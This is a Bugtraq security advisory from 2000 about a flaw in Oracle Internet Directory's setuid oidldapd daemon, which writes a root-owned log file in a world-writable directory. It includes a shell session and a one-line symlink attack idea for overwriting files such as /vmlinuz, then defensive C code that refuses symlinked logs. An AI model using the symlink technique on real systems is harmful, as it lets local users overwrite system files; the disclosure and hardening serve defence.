[18320] in bugtraq
vulnerability #2 in Oracle Internet Directory 2.1.1.1 in Oracle
daemon@ATHENA.MIT.EDU (Juan Manuel Pascual Escriba)
Fri Dec 22 13:22:08 2000
Message-Id: <3A43210C.875511D7@plazasite.com>
Date: Fri, 22 Dec 2000 10:38:20 +0100
Reply-To: pask@PLAZASITE.COM
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in oidldapd in Oracle 8.1.7
Date: 11-12-2000
Platform: Only tested on Linux, but can be exported to others.
Impact: Any user can compromise any file on the local machine.
Author: Juan Manuel Pascual (pask@plazasite.com)
Status: Vendor contacted, answers received. Details below.
OVERVIEW:
oidldapd is the Oracle Internet Directory LDAP daemon. The
current version is 2.1.1.1.
PROBLEM SUMMARY:
There is a write permission checking error in oidldapd that can be
used by local users to write any file on the local machine.
IMPACT:
Any user with local access can write any file.
SOLUTION:
Chmod -s ;-)))).
STATUS:
Vendor was contacted.
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@plazasite.com
--
" In God We trust, Others We monitor "
-------------------------------------------------------------
Juan Manuel Pascual Escriba Administrador de Sistemas
PlazaSite S.A. c/ Tomas Bretsn 32-38
08950 Esplugues de Llobregat (Barcelona), SPAIN
Ph: +34 93 3717398 Fax: +34 93 3711968
mob: 667591142 Email: pask@plazasite.com
-------------------------------------------------------------
Attachment: oidldapd-8.1.7.txt
This feature seems to be new with oidldapd in OID 2.1.1.1/8.1.7; I couldn't
reproduce it with oidldapd in OID 2.0.6.3, and it seems to be very dangerous. Look at
this. On my system the following occurs:
my ORACLE_HOME=/work/oracle8ir3
oracle@dimoniet bin]$ cd /work/oracle8ir3/ldaplog
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx 2 oracle orainstall 4096 Dec 12 05:03 .
drwxr-xrwx 13 oracle orainstall 4096 Dec 10 18:50 ..
OK .. nothing in logs ... let's execute oidldapd.
oracle@dimoniet log]$ /work/oracle8ir3/bin/oidldapd
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx 2 oracle orainstall 4096 Dec 12 05:03 .
drwxr-xrwx 13 oracle orainstall 4096 Dec 10 18:50 ..
-rw-r--r-- 1 root orainstall 86 Dec 12 05:26 oidldapd00.log
Oops ... owned by root? ... no comment .. what about ln -s /vmlinuz ./oidldapd00.log? Or shared libraries?
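An added example, not code from the advisory or from Oracle: one way a privileged daemon can open its log in a directory other users can write to without following a planted link. The function names and the temporary-directory scenario are assumptions made for illustration.

```c
/* Added example: hardened log open for a privileged daemon (not Oracle's code). */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log file without following a symlink planted in a writable directory.
 * Returns an fd, or -1 if the path is a symlink, not a regular file,
 * multiply linked, or owned by someone other than `owner`. */
int open_log_safely(const char *path, uid_t owner)
{
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0640);
    if (fd < 0)
        return -1;                      /* ELOOP when the final component is a symlink */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);                      /* hard link or foreign file: refuse it */
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink named like the daemon's log points at a
 * "victim" file. Returns 1 if that open is refused and the victim is untouched
 * while a plain log file in the same directory still opens. */
int symlink_case_is_refused(void)
{
    char dir[] = "/tmp/oidlogXXXXXX", victim[64], lnk[64], plain[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/oidldapd00.log", dir);
    snprintf(plain, sizeof plain, "%s/oidldapd01.log", dir);
    int v = open(victim, O_WRONLY | O_CREAT, 0600);
    if (v < 0 || write(v, "data", 4) != 4 || close(v) != 0) return 0;
    if (symlink(victim, lnk) != 0) return 0;
    int refused = open_log_safely(lnk, geteuid()) == -1;
    int ok = open_log_safely(plain, geteuid());
    int intact = stat(victim, &st) == 0 && st.st_size == 4;
    if (ok >= 0) close(ok);
    unlink(lnk); unlink(plain); unlink(victim); rmdir(dir);
    return refused && ok >= 0 && intact;
}

int main(void) { return symlink_case_is_refused() ? 0 : 1; }
```

These flags only stop the link-following case; opening the log after dropping to the invoking user's uid, or removing the setuid bit as the advisory suggests, removes the privileged write altogether.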